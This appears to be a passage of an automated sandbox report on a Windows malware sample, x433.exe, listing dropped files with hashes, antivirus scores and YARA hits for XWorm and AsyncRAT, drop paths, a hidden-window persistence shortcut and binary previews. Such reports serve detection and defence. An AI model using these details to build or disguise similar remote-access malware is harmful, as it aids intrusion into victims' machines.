                                                SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                Malicious:true
                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..
                                                Process:C:\Users\user\AppData\Local\x4usb.exe
                                                File Type:CSV text
                                                Category:dropped
                                                Size (bytes):654
                                                Entropy (8bit):5.380476433908377
                                                Encrypted:false
                                                SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                Malicious:false
                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..
                                                Process:C:\Windows\System32\lsass.exe
                                                File Type:very short file (no magic)
                                                Category:modified
                                                Size (bytes):1
                                                Entropy (8bit):0.0
                                                Encrypted:false
                                                SSDEEP:3::
                                                MD5:93B885ADFE0DA089CDF634904FD59F71
                                                SHA1:5BA93C9DB0CFF93F52B521D7420E43F6EDA2784F
                                                SHA-256:6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D
                                                SHA-512:B8244D028981D693AF7B456AF8EFA4CAD63D282E19FF14942C246E50D9351D22704A802A71C3580B6370DE4CEB293C324A8423342557D4E5C38438F0E36910EE
                                                Malicious:false
                                                Preview:.
                                                Process:C:\Users\user\Desktop\x433.exe
                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):749056
                                                Entropy (8bit):7.928365652662205
                                                Encrypted:false
                                                SSDEEP:12288:ejxppp7nbXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:enppLbsqjnhMgeiCl7G0nehbGZpbD
                                                MD5:851BE4E85B0F111883680E87099483A3
                                                SHA1:155E19AD0D2EC4BEF3BA25512B6E8BC403350EC9
                                                SHA-256:BA2D2058AB95D39A9C05C9C74DFA7C860CC662F33ECD96C35F2C344666472197
                                                SHA-512:BCFD99DF20BA3E713801F9C41BC924379F4F6078703EC1D44E90EC3649AA1B2FCE6CE802A71A0297516CCF344C627C91359434B7166D716DEA69AB41C1FECCE6
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 96%
                                                Preview:MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......G...........H......H.........b...m......mV......>.....m.....Rich...........................PE..L.....4f...............'..................... ....@.........................................................................<9..x....@..8^...........................8..8............................................ ...............................text............................... ..`.rdata..,.... ......................@..@.rsrc...8^...@...`..................@..@.reloc..............................@...........................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Users\user\Desktop\x433.exe
                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):70144
                                                Entropy (8bit):5.900268327783426
                                                Encrypted:false
                                                SSDEEP:1536:5UAK2o5TimSMpHgtbTctvRLRyPhnMOplJUsnS:5TWZPCbTGL8nMOjGuS
                                                MD5:FD744070409A72B86CC2B344D1719B33
                                                SHA1:D58DED881812057A3B51E6F753FFBFE243AF112E
                                                SHA-256:D2FD71588DD2D33C5AD58C1A5382DE38227AD86092CAE7401EE95C7701282730
                                                SHA-512:8EBDE5880105F2831377C26800FDD2B482BD2FDFC5C5539CE0901828D78BD1D2475474CC5859E3A0F92A305A21BD3C1C98834E1746402D708E84622E088717D9
                                                Malicious:true
                                                Yara Hits:
                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\x4host.exe, Author: Joe Security
                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\x4host.exe, Author: Joe Security
                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\x4host.exe, Author: ditekSHen
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 92%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....@.f.............................&... ...@....@.. ....................................@..................................%..O....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................&......H........Z..@.......&.....................................................(....*.r...p*. ....*..(....*.r!..p*. s...*.s.........s.........s.........s.........*.re..p*. ...*.r...p*. .y4.*.r...p*. ~.H.*.r1..p*. ....*.ru..p*..((...*.r...p*.r...p*. .t..*.(*...-.(+...,.+.(,...,.+.()...,.+.((...,..(L...*&(....&+.*.+5s^... .... .'..o_...(*...~....-.(Y...(K...~....o`...&.-.*.rM..p*. ;%A.*.r...p*. .A..*.r...p*. %^~.*.r...p*. .-N.*.r]..p*. .x!.*.r...p*. .w.*.r...p*. l...*.r)..p*. .s..
                                                Process:C:\Users\user\AppData\Local\Temp\x4host.exe
                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):70144
                                                Entropy (8bit):5.900268327783426
                                                Encrypted:false
                                                SSDEEP:1536:5UAK2o5TimSMpHgtbTctvRLRyPhnMOplJUsnS:5TWZPCbTGL8nMOjGuS
                                                MD5:FD744070409A72B86CC2B344D1719B33
                                                SHA1:D58DED881812057A3B51E6F753FFBFE243AF112E
                                                SHA-256:D2FD71588DD2D33C5AD58C1A5382DE38227AD86092CAE7401EE95C7701282730
                                                SHA-512:8EBDE5880105F2831377C26800FDD2B482BD2FDFC5C5539CE0901828D78BD1D2475474CC5859E3A0F92A305A21BD3C1C98834E1746402D708E84622E088717D9
                                                Malicious:true
                                                Yara Hits:
                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\x4usb.exe, Author: Joe Security
                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\x4usb.exe, Author: Joe Security
                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\x4usb.exe, Author: ditekSHen
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 92%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....@.f.............................&... ...@....@.. ....................................@..................................%..O....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................&......H........Z..@.......&.....................................................(....*.r...p*. ....*..(....*.r!..p*. s...*.s.........s.........s.........s.........*.re..p*. ...*.r...p*. .y4.*.r...p*. ~.H.*.r1..p*. ....*.ru..p*..((...*.r...p*.r...p*. .t..*.(*...-.(+...,.+.(,...,.+.()...,.+.((...,..(L...*&(....&+.*.+5s^... .... .'..o_...(*...~....-.(Y...(K...~....o`...&.-.*.rM..p*. ;%A.*.r...p*. .A..*.r...p*. %^~.*.r...p*. .-N.*.r]..p*. .x!.*.r...p*. .w.*.r...p*. l...*.r)..p*. .s..
                                                Process:C:\Users\user\AppData\Local\Temp\x4Shellcode.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):12320
                                                Entropy (8bit):7.985919691160046
                                                Encrypted:false
                                                SSDEEP:192:L5VvI+JeIVNOruWx5b+6hjLpQOAwL4Hk7vi08F6/fb2x5VEtRO3Zr+NckcH:VRVNOfXdKwUH6vi0M4b2x5i00cH
                                                MD5:187D1168C3B5E8613689542EEA6816F9
                                                SHA1:B59CBEB2539A140F4E9BE12D79097AF2DFF4BB35
                                                SHA-256:4A0F28D0A026C262CF2C0F0BB898292B0E8C23E614E5E7250BD5293688983DA7
                                                SHA-512:D0CA9B1F3F734E8EADD0F38D924433DFE770CA716D6458918312B95A54D8FBBB7C9300C8D4A6BDB8D3C6DF9EE3FB1FD809A07825042218C66D6D96B2A3C00769
                                                Malicious:false
                                                Preview:Dl..K..D...t.-.&s........6_$.v?.-..._:...LO..Nv..I...X......|..5.....<...\.4.I..L.....5...&..m\..[J...*.........E.|=..7...$%..E.....4x.x.q'k.N.)..m- .h.)..|..'g.3...O..x.[...N|.q..|....S.Ok`.. =hSR..v.h..&H.O....te^7..i.a.<$...~.v...;Ty.X..(..Id.s.'7.T.#c..2*.x$....0.a.Gi..A.L....#.C.n.}:@...>3.a..s...S.$%.f..UI..?....!.....!q....u.#s.U...Y.....3].h....r.d/.M~w.......!..m..T.%._..|A.[0..b..f8.?..D....4......d1.:.>+.J..+.....+.9l.k..e.oa...b>.r.T..K.-....s...*1xq/...W..cr.P.g......(.(h.h|.....{,T.i...QD1..q.-...o.A...-(P.O...r....:prd.O`.t..(Pv..Cx(=...&Pb...q...w...~..i..7.....tQ..5_0oou=4..*.....V.4q..}..."Z.rLTb....x.S..xU...B...9.N...I$.J........9.Qz.....k.W*...~...'..z.9)!.D.H...^.}...d.0;.......w.z3...F];.7ill...(.#.....n.?.TEP)'.....1...o..}.Ja.....Q1.o...kt..q..Sr.@?.u..N.o..e.A..a.#S.H.....Y.Z-Wul.;PVH.m..u.H..[k...I..x.UM.Y.... Qg....lx.0rp.^_\...R.!H.X4V..g....]..w...^.:vc..g...~..k?gI....v5..|..~+.mT....".K.}.h...gnJ....9-.. .j+)
                                                Process:C:\Users\user\AppData\Local\Temp\x4host.exe
                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Jul 1 21:31:04 2024, mtime=Mon Jul 1 21:31:04 2024, atime=Mon Jul 1 21:31:04 2024, length=70144, window=hide
                                                Category:dropped
                                                Size (bytes):947
                                                Entropy (8bit):5.055970444059929
                                                Encrypted:false
                                                SSDEEP:12:8bnfQy47nWCngdaZ10Rkli7KKTEjAbfjf1KwgUNwuLEF844t2YZ/elFlSJmZmV:8bm7WzW10RkMrkAbfL8w7kF7qyFm
                                                MD5:7679692979AEB68C08A2A36054F9F6E4
                                                SHA1:9B1451150FD7C9964562FFAB376E1600666BD8A0
                                                SHA-256:AD139EF6837326C19F4471C92A8A16134997F5932E094FE08348F6B8D8AFBF33
                                                SHA-512:710AEEE11181200CA8C5A3583FB2DDB0481469B9AAC13456051444D442AA8A90FBE75D1646C98141F004998F2A297847038C9C7B2A2B38188D700E1806E3CB41
                                                Malicious:false
                                                Preview:L..................F.... ......[.......[.......[............................j.:..DG..Yr?.D..U..k0.&...&......vk.v....NCPS.....h.[........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.X............................%..A.p.p.D.a.t.a...B.P.1......X...Local.<......CW.^.X.....b.....................QP'.L.o.c.a.l.....\.2......X. .x4usb.exe.D.......X..X...............................x.4.u.s.b...e.x.e.......U...............-.......T............s.......C:\Users\user\AppData\Local\x4usb.exe..!.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.x.4.u.s.b...e.x.e.............:...........|....I.J.H..K..:...`.......X.......494126...........hT..CrF.f4... ..T..b...,.......hT..CrF.f4... ..T..b...,..................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):64
                                                Entropy (8bit):1.1628158735648508
                                                Encrypted:false
                                                SSDEEP:3:Nlllul1:NllU
                                                MD5:333779D8BE2493FA95B21379569EDFE3
                                                SHA1:24C47B1CB09DFC3107253E94D11BF2285F103C98
                                                SHA-256:D103841352D46A89D37BC5FA123910DAA80794F7FD73633C7141E512CAB75BD0
                                                SHA-512:26BD78C3439435639FDE248B70F4615F9081B5B59E922F05376CA39AF5C0C4844771C122B804BB6E30764C2BE8944EFCCF5CB0A58CCBA950F24A7B858BC1AB8B
                                                Malicious:false
                                                Preview:@...e................................................@..........
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:modified
                                                Size (bytes):2352
                                                Entropy (8bit):3.6960365711281247
                                                Encrypted:false
                                                SSDEEP:48:Mcn0qgCrP+kcSLdwSCtR65EfWHjjP4OFiNaKQyr7O3:PLgnjJOLjjP4Ok4Ky3
                                                MD5:3CA92ED1B84418BACB1E74C2F315E839
                                                SHA1:58050D9C7BBDA4D81122576E46FA8DD5D7931E9C
                                                SHA-256:9F9DEDEFFE9DCDA75663A2323F2BFE1534A793931FD982D60C863C8B95D87B79
                                                SHA-512:E53F894747B6698400E3142711E1237859CAFAFC838B876F99CD565E2C6155191F30AC4B95E453A3EE3B49164345824F23C77B0C71F624D3645B31EA6B47EF8E
                                                Malicious:false
                                                Preview:ElfChnk.................q.......q...............0............................................................................@.................g...........................=...................................................................................p...................................t...?...........................................F...................M...5...........................@...................................................................................................................&...**..0...q.......Fh0d..............&...........=..R..u..$.w.......A..k...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..2............{..P.r.o.v.i.d.e.r.......F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.C.A.P.I.2.F........)...G.u.i.d.....&.{.5.b.b.c.a.4.a.8.-.b.2.0.9.-.4.8.d.c.-.a.8.c.7.-.b.2.3.d.3.e.5.2.1.6.f.b.}.
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:MS Windows Vista Event Log, 3 chunks (no. 2 in use), next record no. 304, DIRTY
                                                Category:dropped
                                                Size (bytes):109960
                                                Entropy (8bit):3.645207627098521
                                                Encrypted:false
                                                SSDEEP:768:KVUHiapX7xadptrDT9W84uCVUHiapX7xadptrDT9W84u:FHi6xadptrX9WPyHi6xadptrX9WP
                                                MD5:AB6D3A670A209791D915A286A0A8C86D
                                                SHA1:BA7F8AEAEA148BEF4944DDC3B55F48DFE473F4D9
                                                SHA-256:E93D8B58FF20EA259AE1D01FACDAE59DE80D3832B0089F34149146E29F904A44
                                                SHA-512:4CAD772F5C3AE6F0B830014D440B3ECED87EF52AFE621C765C1A4D72B2156623D69590B34C2B18D3809932F171D94849019DC1B4DD93BAA983ADEF5D67278C3B
                                                Malicious:false
                                                Preview:ElfFile.................0...................................................................................................Fo.xElfChnk.........1...............1...........p..........`......................................................................................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........r...................m..............qo...................>...;..................**..............4.9...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):2.010692427789071
                                                Encrypted:false
                                                SSDEEP:384:GhLNzhNCjN0QNGNgN7NxEN5N0RN0zN0mN0RN00N0oN0xN0qNeN0NN0UN0lN09N0Q:GnqqIJMa/Mh9sUwBYAJGUarGlEwxV
                                                MD5:26C4C5213F3C6B727417EF07207AC1E0
                                                SHA1:1815CC405C8B70939C252390E2A1AEC87EFF45F2
                                                SHA-256:767656ADC7440970A3117E0DA8E066D9A3E1DA88CBC82ACABCFA37A3985D5608
                                                SHA-512:0355BBF16EB471698F47189031E8E18306D8F748E6CC5328C33301BEAAE435647532B24F5EC42A94B92390C19E60D11846B412C6747DC82DC98999E649607B65
                                                Malicious:false
                                                Preview:ElfChnk.%.......J.......%.......J............b..Pe.....:....................................................................&...................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...........].......M...............................VY..................................**......%........0................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):1424
                                                Entropy (8bit):3.360630425078906
                                                Encrypted:false
                                                SSDEEP:24:MQ/w/DTg2W8kNuB8KBD8/4NeGDrNt88nA8KBD8/4Nes:MQYtWBuGV+3Zt88V+j
                                                MD5:86F2F26E7C34802965666B9A7A1233D7
                                                SHA1:D7570CEFDC3C4255A07135F825AF456C18F4EF94
                                                SHA-256:B894F24308CC4830C8B0C1091EF81FA8D258B476590FA4EE3AE55CEAD480014D
                                                SHA-512:D3DD1E4A75A67B6B0CB97CEC31EBC396A8879A36EF61413D89998520C7BCB81C804C89BA70E3C3D9CA07F4441F43A09B9B3A5D0DF22B54266FE1AC9B1495D54E
                                                Malicious:false
                                                Preview:ElfChnk...............................................a'......................................................................Y.................0.......................X...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**...............[5a..............&...............................................................@.......X...a.!.....E..........@.[5a......&O....po'O........P........................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.A.p.p.X.D.e.p.l.o.y.m.e.n.t...'..Y.J.R>:..=_M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.A.p.p.X.D.e.p.l.o.y.m.e.n.t./.O.p.e.r.a.t.i.o.n.a.l...f.d.........N...M.i.c.r.o.s.o.f.t...W.i.n.d.o.w.s...S.e.a.r.c.h._.c.w.5.n.1.h.2.t.x.y.e.w.y.....O.p....**...............e7a............
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):4.428192707917486
                                                Encrypted:false
                                                SSDEEP:384:EhTm5mcemNQDmomTDDr0moOm3OPlfmMsgJm5mnmYmcmum/mqmlmtmumbsmbmvMmk:EiJD6CL49mVpgwQFQ
                                                MD5:2DEE8A172EF1B2DDD0E1087AD572B2F4
                                                SHA1:F85A7832CEC07F3C1E823114135F7F1D7220759A
                                                SHA-256:3FF6FF846E9BCB572188BE71416E028B541B57AFA4955B82BABFA256CA13352E
                                                SHA-512:F209B1F33AC960BACD4E82596937DD8DED826508D74C5A4E4558E4197D889B147C9FD1059D090C02279235479318122929718DC29674DFB456C03ADB34471C54
                                                Malicious:false
                                                Preview:ElfChnk..!.......!.......!.......!..................@..J.......................................................................................J.......................r...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................#...............&...................................**.......!......o.T..............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:MS Windows Vista Event Log, 1 chunks (no. 0 in use), next record no. 2, DIRTY
                                                Category:dropped
                                                Size (bytes):69448
                                                Entropy (8bit):0.6200253525356775
                                                Encrypted:false
                                                SSDEEP:96:5yNVaO8sMa3Z85ZMLirjj73Z85ZujNVaO8sMa3Z85ZMLirjj73Z85Zu:5EV7pp8nML6v7p8nsV7pp8nML6v7p8n
                                                MD5:EAD066BFC4980966ED54781361CD8AE7
                                                SHA1:A6566CB2C786680C22A26B0A1025E7474DEECED3
                                                SHA-256:6B7F5065C7423829ED9F6CCBDC15617E0195A949105D6371903880CFF2BE964F
                                                SHA-512:D86CC93F6914EBD8A2A5D95831A9174A9F0A473501F07D1F5D7DFD00EB5B3893641304115AFBB0FC7DA30EF469AEA27E8AB64D570EBFDF7121B2B7E0964D8CF2
                                                Malicious:false
                                                Preview:ElfFile.....................................................................................................................A..>ElfChnk.....................................p.......C..\.....................................................................($w............................................=...........................................................................................................................f...............?...................................p...........M...F...................................................................................................................................&...............**..p...........n.d.............g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):4.014860518194814
                                                Encrypted:false
                                                SSDEEP:1536:xbBN2A4VD7VAx8whAGU2woJQghcI5oIRA4Hw:
                                                MD5:4FB8E2CF8B3F20534836684947962DC2
                                                SHA1:B263607E627C81DA77DB65DF5AED2F3FD84B83E2
                                                SHA-256:DEAB680C467984C31D118AC595F0F57E573CEEC460CC4B43FCEB0BD66F731294
                                                SHA-512:D982DB741A044E222D567712FB4799FF6524A1D451C3D2EE3DF7EB17031AD20EF4EC7098BCFB3E2B00C929EB6569C858EFCF275B28240425E4BF8D994AED9053
                                                Malicious:false
                                                Preview:ElfChnk.........V...............V...................0q....................................................................... I............................................=...................................................................................%.......................................X...............?...............................................M...F...................................................................................................................................z...............**..............................g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):4.15655690871689
                                                Encrypted:false
                                                SSDEEP:768:SPB9TXYa1RFxRaayVadMRFyfqd9xZRta7Ea+5BVZUeaBhN1dJhlBlBJ9tFk6dd3s:eXY5nVYIyyqED5BVZUeouPZ
                                                MD5:2DE60575CB719BF51FAB8A63F696B052
                                                SHA1:BD44E6B92412898F185D5565865FEA3778573578
                                                SHA-256:7C14D6D72CD2DE834A0C4D17A68B2584B83B81C647D2C439E1071600E29A803D
                                                SHA-512:0471E7824795996992E736F33FEA7AF70EA909804DE3AC59EE76B5D0403901A5147558256C3AAE87BA8F1747D151DE63134661BEB9F6E0FF25AB0E3E89BC6B4A
                                                Malicious:false
                                                Preview:ElfChnk.........o...............o..........................................................................................._..................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................................................y.......................**................9..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):93800
                                                Entropy (8bit):2.148333479729536
                                                Encrypted:false
                                                SSDEEP:384:+KosKeoehhdo69CcoTorNorWorbvorTorZorQorNor7orqorlGhorRor9orwTor/:DDCY5DCYkU
                                                MD5:155EE51837E21F3C1B36CA1B56530808
                                                SHA1:C007F81471EF8C04D7DF7667254BAD78E282DAF8
                                                SHA-256:6E76A3935A982EDB06391B0543AE52B7B4E13A94AFC74A07529AC94E4C665AF1
                                                SHA-512:7538747ECCD333D0BA10FCC8183DC51B6683325F682B1B9C48A070CB41ADD3FEB3DE24869BDF3B3237CE2D9B1BAC669604E7A9092FC85DA7D5EE3FBE6C4D98FC
                                                Malicious:false
                                                Preview:ElfChnk......................................+...-...F........................................................................&................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................&....................................................................................$..U)..............................**..............y..R...............$..............................................................>.......V...X.!..e..............y..R......&O......'O........l........................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.C.o.d.e.I.n.t.e.g.r.i.t.y..k.N.<.D..97d>7.M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.C.o.d.e.I.n.t.e.g.r.i.t.y./.O.p.e.r.a.t.i.o.n.a.l...!>.U)......!>....[.U.....i...........|...:....A..3...b...%....=.......F.i.l.e.N.a.m.e.L.e.n.g.t.h.......A..3...b...%....=.......F.i.l.e.N
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.8524226245257144
                                                Encrypted:false
                                                SSDEEP:384:JhAiPA5PNPxPEPHPhPEPmPSPRP3PoPpPTP8PXPr5P:J2Nr
                                                MD5:B8E105CC52B7107E2757421373CBA144
                                                SHA1:39B61BEA2065C4FBEC143881220B37F3BA50A372
                                                SHA-256:B7EE076088005866A01738ECD3421A4DA3A389FFB9EEB663687823E6647F7B4B
                                                SHA-512:7670455904F14DA7A9EEFBAD5616D6D00EA262C979EDABB433182500B6EF918C6E534C94DF30D829016C8539DF12CAD5F53EC884C45AA71ACA35CF9B797361BC
                                                Malicious:false
                                                Preview:ElfChnk......................................#...&...l2.......................................................................................N...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&....................................................................................#..........'.......................**..x.............|..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                Process:C:\Windows\System32\svchost.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.8432997252442703
                                                Encrypted:false
                                                SSDEEP:384:4hZ21JJgL4JJFiJJ+aeJJ+WBJJ+5vJJ+/UJJ+4fJJ+CwJJ+D2JJ+a2JJ+JtJJ+l9:4WXSYieD+tvgzmMvRpBWfb
                                                MD5:39EE3557626C7F112A88A4DE12E904C1
                                                SHA1:C307FECC944D746A49EEA6451B7DA7301F03504C
